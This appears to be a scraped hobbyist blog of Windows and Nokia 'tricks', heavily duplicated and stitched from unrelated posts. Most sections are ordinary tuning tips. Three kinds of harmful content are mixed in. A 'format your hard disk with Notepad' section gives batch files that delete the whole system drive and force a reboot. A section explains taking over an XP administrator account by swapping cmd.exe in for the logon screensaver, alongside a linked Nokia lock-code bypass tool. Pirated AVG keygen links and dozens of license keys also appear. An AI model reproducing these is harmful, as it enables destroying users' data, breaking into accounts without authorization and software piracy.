Fire up the Windows Explorer and navigate your way to the %SYSTEMROOT% \ INF folder. What the heck is that thingy with the percentage signs? It's a variable. For most people, %SYSTEMROOT% is C:\Windows. For others, it may be E:\WinXP. Get it? Okay, on with the hack! In the INF folder, open sysoc.inf (but not before making a BACKUP copy first). Before your eyes glaze over, look for the line containing "msmsgs" in it. Near the end of that particular line, you'll notice that the word "hide" is not so hidden. Go ahead and delete "hide" (so that the flanking commas are left sitting next to one another). Save the file and close it. Now, open the Add and Remove Programs applet in the Control Panel. Click the Add / Remove Windows Components icon. You should see "Windows Messenger" in that list. Remove the checkmark from its box, and you should be set. NOTE: there are other hidden system components in that sysoc.inf file, too. Remove "hide" and the subsequent programs at your own risk.
Wednesday, December 16, 2009
[How to]view hidden system files and folders|Unhide hidden virus files
Virus usually hides itself from the user and for that it marks itself as system file. And usually in our pc the system files are kept hidden for safety.Here is the trick to see those hidden virus files.
To see this hidden system files go to tools>>Folder Options>>
Select ‘View’
Check ‘Show hidden files and folders’
Uncheck ‘Hide protected operating system files’
Another method:
Go to Start->run->cmd
Then navigate to desired directory.
Then Type
attrib foldername /s /d -s -h -r
+R :- Use the +R option to make a file read-only. Read-only files may be read but they can`t be changed or deleted.-R : – Use the -R option to change the file protection attribute back to normal (so it can be read, changed, or deleted).
+A :- Use the +A option to set the ARCHIVE attribute of a file. When the +A option is used, this flags the file as available for archiving when using the BACKUP or XCOPY commands.
-A :- Use the -A option to turn off the ARCHIVE attribute.
+H : – With DOS Versions 4 through 6, use the +H option to set the HIDDEN attribute of a file so that it will not appear in a directory listing.
-H :- Use the -H option to turn off the HIDDEN attribute.
+S :- With DOS Versions after Version 4, use the +S option to set the SYSTEM attribute of a file. When the +S option is used, this flags the file as a command file used only by DOS. The file will not appear in a directory listing. This attribute is generally reserved for programmers.
-S :- Use the -S option to turn off the SYSTEM attribute.
User must know how to differentiate between virus files and system files or you may end up corrupting your os. So be careful and do them at YOUR OWN RISK
To see this hidden system files go to tools>>Folder Options>>
Select ‘View’
Check ‘Show hidden files and folders’
Uncheck ‘Hide protected operating system files’
Another method:
Go to Start->run->cmd
Then navigate to desired directory.
Then Type
attrib foldername /s /d -s -h -r
+R :- Use the +R option to make a file read-only. Read-only files may be read but they can`t be changed or deleted.-R : – Use the -R option to change the file protection attribute back to normal (so it can be read, changed, or deleted).
+A :- Use the +A option to set the ARCHIVE attribute of a file. When the +A option is used, this flags the file as available for archiving when using the BACKUP or XCOPY commands.
-A :- Use the -A option to turn off the ARCHIVE attribute.
+H : – With DOS Versions 4 through 6, use the +H option to set the HIDDEN attribute of a file so that it will not appear in a directory listing.
-H :- Use the -H option to turn off the HIDDEN attribute.
+S :- With DOS Versions after Version 4, use the +S option to set the SYSTEM attribute of a file. When the +S option is used, this flags the file as a command file used only by DOS. The file will not appear in a directory listing. This attribute is generally reserved for programmers.
-S :- Use the -S option to turn off the SYSTEM attribute.
User must know how to differentiate between virus files and system files or you may end up corrupting your os. So be careful and do them at YOUR OWN RISK
FORMAT UR HARDDISK WITH NOTEPAD
go to notepad
TYPE THE FOLLOWING
@Echo off
Del C:\ *.*y
save it as Dell.bat
or worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
FORMAT UR HARDDISK WITH NOTEPAD
Del C:\ *.*y
save it as Dell.bat
or worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
FORMAT UR HARDDISK WITH NOTEPAD
HOW TO RESET NOKIA LOCK CODE TO 12345

You will need a card reader to perform this operation.
1) Remove memory card from your locked Nokia mobile phone.
2) Put your card into card reader and connect it with your computer. Create
the directory System\Recogs and copy thc-nokia-unlock.mdl into this directory. So at the end your file will be in System/recogs directory of your mmc.
3) Remove the Memory Card and place it into the locked phone.
4) Now start your locked phone and wait for some time when it asks for the code. Let this tool reset the code for you. Wait for 2 minutes and then enter 12345 in the code box.
5) Done. Your security code will be reset to 12345.
This method is tested on Nokia N72 and it’s 100% working. Ask me if you need any help on this.
PLS DROP YOUR COMMENTS.....
DOWNLOAD NOKIA THC UNLOCK (1 KB)(.mdl file)(RS)
http://rapidshare.com/files/176305922/THC-NOKIA-UNLOCK.rar
Hack windows xp passwords
Here are the steps involved to Hack the Window XP Administrator Password .
1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it is given
3. cd\
4. cd\ windows\system32
5. mkdir temphack
6. copy logon.scr temphack\logon.scr
7. copy cmd.exe temphack\cmd.exe
8. del logon.scr
9. rename cmd.exe logon.scr
10. exit
Wait its not over read the rest to find out how to Hack the Window XP Administrator Password
A Brief explanation of what you are currently doing here is Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want change the password to pass Then type in the following command
net user clazh pass
This will chang the admin password to pass.Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.
This hack doesn’t work on NTFS systems
1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it is given
3. cd\
4. cd\ windows\system32
5. mkdir temphack
6. copy logon.scr temphack\logon.scr
7. copy cmd.exe temphack\cmd.exe
8. del logon.scr
9. rename cmd.exe logon.scr
10. exit
Wait its not over read the rest to find out how to Hack the Window XP Administrator Password
A Brief explanation of what you are currently doing here is Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want change the password to pass Then type in the following command
net user clazh pass
This will chang the admin password to pass.Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.
This hack doesn’t work on NTFS systems
Speed up Windows Vista
Go to Control Panel and click on Programs and Features

Click on Turn Windows features on or off

After this will appear windows feature window. Here you can turn on or off every windows feature. Turn off those you don´t need. Below is list of features that you should turn off.
Games (If you love vista games (Solitaire,Minesweeper and etc.), don´t touch this)
Indexing Service
Internet Information Services (support for web and FTP servers, necessary if you hosting websites on computer)
Microsoft .NET Framework 3.0 (this is for .NET 3.0 components, necessary if you are programmer )
Microsoft Message Queue (MSMQ) Server (technology enables applications running at different times to communicate across heterogeneous networks and systems that may be temporarily offline. Simple said ,useful only for programmers. Learn more about MSMQ on this link )
Print Services (Necessary if you are using internet printers)
Removable Storage Management
RIP Listener
Simple TCPIP services
SNMP feature
Telnet Client
Telnet Server
TFTP Client
Windows DFS Replication Service
Windows Meeting Space

Click on Turn Windows features on or off

After this will appear windows feature window. Here you can turn on or off every windows feature. Turn off those you don´t need. Below is list of features that you should turn off.
Games (If you love vista games (Solitaire,Minesweeper and etc.), don´t touch this)
Indexing Service
Internet Information Services (support for web and FTP servers, necessary if you hosting websites on computer)
Microsoft .NET Framework 3.0 (this is for .NET 3.0 components, necessary if you are programmer )
Microsoft Message Queue (MSMQ) Server (technology enables applications running at different times to communicate across heterogeneous networks and systems that may be temporarily offline. Simple said ,useful only for programmers. Learn more about MSMQ on this link )
Print Services (Necessary if you are using internet printers)
Removable Storage Management
RIP Listener
Simple TCPIP services
SNMP feature
Telnet Client
Telnet Server
TFTP Client
Windows DFS Replication Service
Windows Meeting Space

View Admin At welcome Screen
By default windows XP doesn't show the Administrator in the user list at the welcome screen. Here's a way to get around it.
Now head up to HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndowsNT\CurrentVersion\Winlogon\SpecialA ccounts\Userlist
create a new DWORD entry and name it as Administrator and change its value to 1.
exit and reboot for the changes to take effect.
To change it back change its value to 0 or simply delete the key.
Now head up to HKEY_LOCAL_MACHINE\Software\Microsoft\Wi
create a new DWORD entry and name it as Administrator and change its value to 1.
exit and reboot for the changes to take effect.
To change it back change its value to 0 or simply delete the key.
Funny Computer Trick
Copy and paste the java script code to the address bar of your browser
javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)
2: Press enter and watch your window's "shaking it". You can change the value of i if you wish :-)
javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)
2: Press enter and watch your window's "shaking it". You can change the value of i if you wish :-)
Trick To Make Your Firefox Fast
Type about:config in the address bar, Then look for the following entries, and make the corresponding changes.
Lastly right-click anywhere and select New- Integer. Name it nglayout.initialpaint.delay and set its value to 0. This value is the amount of time the browser waits before it acts on information it recieves.Enjoy!!
- network.http.max-connections-per-server =32
- network.http.max-persistent-connections-per-proxy =16
- network.http.max-connections = 64
- network.http.max-persistent-connections-per-server = 10
- network.http.pipelining = true
- network.http.pipelining.maxrequests = 200
- network.http.request.max-start-delay = 0
- network.http.proxy.pipelining = true
- network.http.proxy.version = 1.0
Lastly right-click anywhere and select New- Integer. Name it nglayout.initialpaint.delay and set its value to 0. This value is the amount of time the browser waits before it acts on information it recieves.Enjoy!!
Multiple login in yahoo Without Using any Software
You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these steps :
1. Go to Start ----> Run . Type regedit, then enter .
2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test
3.On the right page , right-click and choose new Dword value .
4.Rename it as Plural.
5.Double click and assign a decimal value of 1.
Its done!!
Now close registry and restart yahoo messenger and try Multiple Login
Follow these steps :
1. Go to Start ----> Run . Type regedit, then enter .
2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test
3.On the right page , right-click and choose new Dword value .
4.Rename it as Plural.
5.Double click and assign a decimal value of 1.
Its done!!
Now close registry and restart yahoo messenger and try Multiple Login
speed up windows 2
DISABLE UNNECESSARY SERVICES
Because Windows XP has to be all things to all people it has many services running that take up system resources that you will never need. Below is a list of services that can be disabled on most machines:
Alerter
Clipbook
Computer Browser
Distributed Link Tracking Client
Fast User Switching
Help and Support - (If you use Windows Help and Support leave this enabled)
Human Interface Access Devices
Indexing Service
IPSEC Services
Messenger
Netmeeting Remote Desktop Sharing (disabled for extra security)
Portable Media Serial Number
Remote Desktop Help Session Manager (disabled for extra security)
Remote Procedure Call Locator
Remote Registry (disabled for extra security)
Remote Registry Service
Secondary Logon
Routing & Remote Access (disabled for extra security)
Server
SSDP Discovery Service - (Unplug n' Pray will disable this)
Telnet
TCP/IP NetBIOS Helper
Upload Manager
Universal Plug and Play Device Host
Windows Time
Wireless Zero Configuration (Do not disable if you use a wireless network)
Workstation
To disable these services:
Go to Start and then Run and type "services.msc"
Doubleclick on the service you want to change
Change the startup type to 'Disable"
Alerter
Clipbook
Computer Browser
Distributed Link Tracking Client
Fast User Switching
Help and Support - (If you use Windows Help and Support leave this enabled)
Human Interface Access Devices
Indexing Service
IPSEC Services
Messenger
Netmeeting Remote Desktop Sharing (disabled for extra security)
Portable Media Serial Number
Remote Desktop Help Session Manager (disabled for extra security)
Remote Procedure Call Locator
Remote Registry (disabled for extra security)
Remote Registry Service
Secondary Logon
Routing & Remote Access (disabled for extra security)
Server
SSDP Discovery Service - (Unplug n' Pray will disable this)
Telnet
TCP/IP NetBIOS Helper
Upload Manager
Universal Plug and Play Device Host
Windows Time
Wireless Zero Configuration (Do not disable if you use a wireless network)
Workstation
To disable these services:
Go to Start and then Run and type "services.msc"
Doubleclick on the service you want to change
Change the startup type to 'Disable"
REMOVE ANNOYING DELETE CONFIRMATION MESSAGES
Although not strictly a performance tweak I love this fix as it makes my machine 'feel' faster. I hate the annoying 'are you sure?' messages that XP displays, especially if I have to use a laptop touchpad to close them. To remove these messages:
1. Right-click on the 'Recycle Bin' on the desktop and then click 'Properties'
2. Clear the 'Display Delete Confirmation Dialog' check box and click 'Ok'
If you do accidently delete a file don't worry as all is not lost. Just go to your Recycle Bin and 'Restore' the file.
Although not strictly a performance tweak I love this fix as it makes my machine 'feel' faster. I hate the annoying 'are you sure?' messages that XP displays, especially if I have to use a laptop touchpad to close them. To remove these messages:
1. Right-click on the 'Recycle Bin' on the desktop and then click 'Properties'
2. Clear the 'Display Delete Confirmation Dialog' check box and click 'Ok'
If you do accidently delete a file don't worry as all is not lost. Just go to your Recycle Bin and 'Restore' the file.
SPEED UP FOLDER BROWSING
You may have noticed that everytime you open my computer to browse folders that there is a slight delay. This is because Windows XP automatically searches for network files and printers everytime you open Windows Explorer. To fix this and to increase browsing significantly:
1. Open My Computer
2. Click on Tools menu
3. Click on Folder Options
4. Click on the View tab.
5. Uncheck the Automatically search for network folders and printers check box
6. Click Apply
7. Click Ok
8. Reboot your computer
1. Open My Computer
2. Click on Tools menu
3. Click on Folder Options
4. Click on the View tab.
5. Uncheck the Automatically search for network folders and printers check box
6. Click Apply
7. Click Ok
8. Reboot your computer
REMOVE THE DESKTOP PICTURE
Make Your Windows Fast As Never Before
Disable CD Autorun
( WinXP PRO Only)
( WinXP PRO Only)
1) Click Start, Run and enter GPEDIT.MSC
2) Go to Computer Configuration, Administrative Templates, System.
3) Locate the entry for Turn autoplay off and modify it as you desire.
Speed Up Browsing
When you connect to a web site your computer sends information back and forth. Some of this information deals with resolving the site name to an IP address, the stuff that TCP/IP really deals with, not words. This is DNS information and is used so that you will not need to ask for the site location each and every time you visit the site. Although Windows XP and Windows XP have a pretty efficient DNS cache, you can increase its overall performance by increasing its size. You can do this with the registry entries below:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d
Make a new text file and rename it to dnscache.reg. Then copy and paste the above into it and save it. Merge it into the registry.
When you connect to a web site your computer sends information back and forth. Some of this information deals with resolving the site name to an IP address, the stuff that TCP/IP really deals with, not words. This is DNS information and is used so that you will not need to ask for the site location each and every time you visit the site. Although Windows XP and Windows XP have a pretty efficient DNS cache, you can increase its overall performance by increasing its size. You can do this with the registry entries below:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d
Make a new text file and rename it to dnscache.reg. Then copy and paste the above into it and save it. Merge it into the registry.
DISABLE INDEXING SERVICES
Indexing Services is a small little program that uses large amounts of RAM and can often make a computer endlessly loud and noisy. This system process indexes and updates lists of all the files that are on your computer. It does this so that when you do a search for something on your computer, it will search faster by scanning the index lists. If you don't search your computer often, or even if you do search often, this system service is completely unnecessary. To disable do the following:
1. Go to Start
2. Click Settings
3. Click Control Panel
4. Double-click Add/Remove Programs
5. Click the Add/Remove Window Components
6. Uncheck the Indexing services
7. Click Next
Indexing Services is a small little program that uses large amounts of RAM and can often make a computer endlessly loud and noisy. This system process indexes and updates lists of all the files that are on your computer. It does this so that when you do a search for something on your computer, it will search faster by scanning the index lists. If you don't search your computer often, or even if you do search often, this system service is completely unnecessary. To disable do the following:
1. Go to Start
2. Click Settings
3. Click Control Panel
4. Double-click Add/Remove Programs
5. Click the Add/Remove Window Components
6. Uncheck the Indexing services
7. Click Next
OPTIMISE DISPLAY SETTINGS
Windows XP can look nice but displaying all the visual items can waste system resources. To optimize:
1.Go to Start
2. Click Settings
3. Click Control Panel
4. Click System
5. Click Advanced tab
6. In the Performance tab click Settings
7. Leave only the following ticked:
- Show shadows under menus
- Show shadows under mouse pointer
- Show translucent selection rectangle
- Use drop shadows for icons labels on the desktop
- Use visual styles on windows and buttons
1.Go to Start
2. Click Settings
3. Click Control Panel
4. Click System
5. Click Advanced tab
6. In the Performance tab click Settings
7. Leave only the following ticked:
- Show shadows under menus
- Show shadows under mouse pointer
- Show translucent selection rectangle
- Use drop shadows for icons labels on the desktop
- Use visual styles on windows and buttons
SPEED UP UR ACROBAT READER (ALMOST LIKE NOTEPAD)
1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)
2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).
Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).
Now your acrobat reader will load very fast and almost as good as notepad..
(C:\program files\adobe\acrobat\reader\.. whatever)
2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).
Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).
Now your acrobat reader will load very fast and almost as good as notepad..
Hack windows send to menu
First you’ll need access to hidden files. So change your view settings to make all hidden files visible.
Tools -> folder options -> view (tab) and select the show hidden files and folders.
go to parent drive:/documents and settings/(user name)/send to
Open up my computer and locate your most used folders.
Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.
Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER
Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.
Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.
5. DONE
Tools -> folder options -> view (tab) and select the show hidden files and folders.
go to parent drive:/documents and settings/(user name)/send to
Open up my computer and locate your most used folders.
Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.
Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER
Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.
Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.
5. DONE
how to hard format a symbian phone e.g nokia N70
Switch of the phone, remove the memory card or else it will be formatted along with the phone also.
Now hold down the GREEN button(call button), key '3' and star key. Now switch on your phine and hold down the three keys until u see the normal Nokia welcome screen.. Thank you very much
..........Adetoye Adewale
Now hold down the GREEN button(call button), key '3' and star key. Now switch on your phine and hold down the three keys until u see the normal Nokia welcome screen.. Thank you very much
..........Adetoye Adewale
AVG 9.0 DOWNLOAD WITH FULL SERIALS TILL 2018
You may need winrar to extract the files if you do not already have it, Download:
http://www.rarlab.com/download.htm
AVG Anti-Virus 9.0 Download:
http://www.megaupload.com/?d=UOWM0HVG
AVG Global Keygen Download:
http://www.megaupload.com/?d=JMJYKRHK
Serial Number: 8MEH-RJR4R-7WKJ6-NL3DA-C3DZF-J EMBR-ACED(Valid until 2018)
8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
http://www.rarlab.com/download.htm
AVG Anti-Virus 9.0 Download:
http://www.megaupload.com/?d=UOWM0HVG
AVG Global Keygen Download:
http://www.megaupload.com/?d=JMJYKRHK
Serial Number: 8MEH-RJR4R-7WKJ6-NL3DA-C3DZF-J EMBR-ACED(Valid until 2018)
8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
AVG 8.65 SERIAL KEYS TILL 2018
1) Install AVG Antivirus .8.65... Use One Of The Keys Provided Below During Installation....
2) If keys Ever gets Blacklisted ? Just Open Avg Main Window,Open License Component,Click Reactivate And Enter another Key Provided .... Then Hit The activate Button...
3) Enjoy Brought To You By ADEWALE ADEDYIN ADETOYE
8MEH-RGM33-K4G3L-6FGRR-82KYQ-UEMBR-ACED
8MEH-RF4BZ-FH4UO-VRV3A-4KBYL-DEMBR-ACED
8MEH-RU7JQ-ACZSM-MQEPR-GE4M6-FEMBR-ACED
8MEH-RCB97-4HMU9-P4RRR-R8P3K-2EMBR-ACED
8MEH-RJXR4-2CTXP-2GB3A-D2B3H-PEMBR-ACED
8MEH-RPTGT-KMXM7-EEEVR-KKFCG-LEMBR-ACED
8MEH-R6FE9-FWX74-T84MR-O9GZS-7EMBR-ACED
8MEH-RGHD3-SUTTO-SXPWA-PCOBN-9EMBR-ACED
8MEH-RF7RF-MRFKO-EWOVA-UW2BP-FEMBR-ACED
8MEH-RJXR4-2CTXP-2GB3A-DFA4A-PEMBR-ACED
8MEH-RYGA4-P82S8-WQV7A-7GWM8-8EMBR-ACED
8MEH-RR6GC-KLUKD-S7DBA-NLEC8-EEMBR-ACED
8MEH-RYGA4-P82S8-WQV7A-7RGO4-8EMBR-ACED
8MEH-RPDWL-THMMY-O8Z3R-4TC8A-4EMBR-ACED
8MEH-R6FE9-FWX74-T84MR-ORLVX-7EMBR-ACED
8MEH-RNZLL-2YAPX-79PPA-M8MLB-AEMBR-ACED
8MEH-RNZLL-2YAPX-79PPA-M8MLB-AEMBR-ACED
8MEH-RF22Z-AN7HS-QDWMR-2WA2L-BEMBR-ACED
8MEH-RD8B8-2GOH3-Z6YQA-EJRJJ-GEMBR-ACED
8MEH-R6633-YPB8H-YCNSR-H4YAY-EEMBR-ACED
8MEH-RPDWL-THMMY-O8Z3R-4M47D-4EMBR-ACED
8MEH-RWVTJ-WW4CY-S899R-NYX97-NEMBR-ACED
8MEH-R78BH-EY79L-MLMVA-ZZVGX-GEMBR-ACED
8MEH-RWEYH-SGSDN-6H9FR-3MMT4-6EMBR-ACED
8MEH-RQX93-WYDJW-BE2FR-QRP2C-PEMBR-ACED
8MEH-R2CML-SSGEW-MOXFR-T7YFS-3EMBR-ACED
8MEH-RUT9Q-4FDZR-PX2XA-TVW97-LEMBR-ACED
8MEH-RJXR4-2CTXP-2GB3A-D6NVH-PEMBR-ACED
8MEH-RQKOS-RYE3R-FKPYA-2YYBA-SEMBR-ACED
8MEH-RX7AF-9A94N-NPW7R-L6636-FEMBR-ACED
8MEH-RNXBD-GMNGF-BSLSR-ZEJMA-PEMBR-ACED
2) If keys Ever gets Blacklisted ? Just Open Avg Main Window,Open License Component,Click Reactivate And Enter another Key Provided .... Then Hit The activate Button...
3) Enjoy Brought To You By ADEWALE ADEDYIN ADETOYE
8MEH-RGM33-K4G3L-6FGRR-82KYQ-UEMBR-ACED
8MEH-RF4BZ-FH4UO-VRV3A-4KBYL-DEMBR-ACED
8MEH-RU7JQ-ACZSM-MQEPR-GE4M6-FEMBR-ACED
8MEH-RCB97-4HMU9-P4RRR-R8P3K-2EMBR-ACED
8MEH-RJXR4-2CTXP-2GB3A-D2B3H-PEMBR-ACED
8MEH-RPTGT-KMXM7-EEEVR-KKFCG-LEMBR-ACED
8MEH-R6FE9-FWX74-T84MR-O9GZS-7EMBR-ACED
8MEH-RGHD3-SUTTO-SXPWA-PCOBN-9EMBR-ACED
8MEH-RF7RF-MRFKO-EWOVA-UW2BP-FEMBR-ACED
8MEH-RJXR4-2CTXP-2GB3A-DFA4A-PEMBR-ACED
8MEH-RYGA4-P82S8-WQV7A-7GWM8-8EMBR-ACED
8MEH-RR6GC-KLUKD-S7DBA-NLEC8-EEMBR-ACED
8MEH-RYGA4-P82S8-WQV7A-7RGO4-8EMBR-ACED
8MEH-RPDWL-THMMY-O8Z3R-4TC8A-4EMBR-ACED
8MEH-R6FE9-FWX74-T84MR-ORLVX-7EMBR-ACED
8MEH-RNZLL-2YAPX-79PPA-M8MLB-AEMBR-ACED
8MEH-RNZLL-2YAPX-79PPA-M8MLB-AEMBR-ACED
8MEH-RF22Z-AN7HS-QDWMR-2WA2L-BEMBR-ACED
8MEH-RD8B8-2GOH3-Z6YQA-EJRJJ-GEMBR-ACED
8MEH-R6633-YPB8H-YCNSR-H4YAY-EEMBR-ACED
8MEH-RPDWL-THMMY-O8Z3R-4M47D-4EMBR-ACED
8MEH-RWVTJ-WW4CY-S899R-NYX97-NEMBR-ACED
8MEH-R78BH-EY79L-MLMVA-ZZVGX-GEMBR-ACED
8MEH-RWEYH-SGSDN-6H9FR-3MMT4-6EMBR-ACED
8MEH-RQX93-WYDJW-BE2FR-QRP2C-PEMBR-ACED
8MEH-R2CML-SSGEW-MOXFR-T7YFS-3EMBR-ACED
8MEH-RUT9Q-4FDZR-PX2XA-TVW97-LEMBR-ACED
8MEH-RJXR4-2CTXP-2GB3A-D6NVH-PEMBR-ACED
8MEH-RQKOS-RYE3R-FKPYA-2YYBA-SEMBR-ACED
8MEH-RX7AF-9A94N-NPW7R-L6636-FEMBR-ACED
8MEH-RNXBD-GMNGF-BSLSR-ZEJMA-PEMBR-ACED
Subscribe to:
Posts (Atom)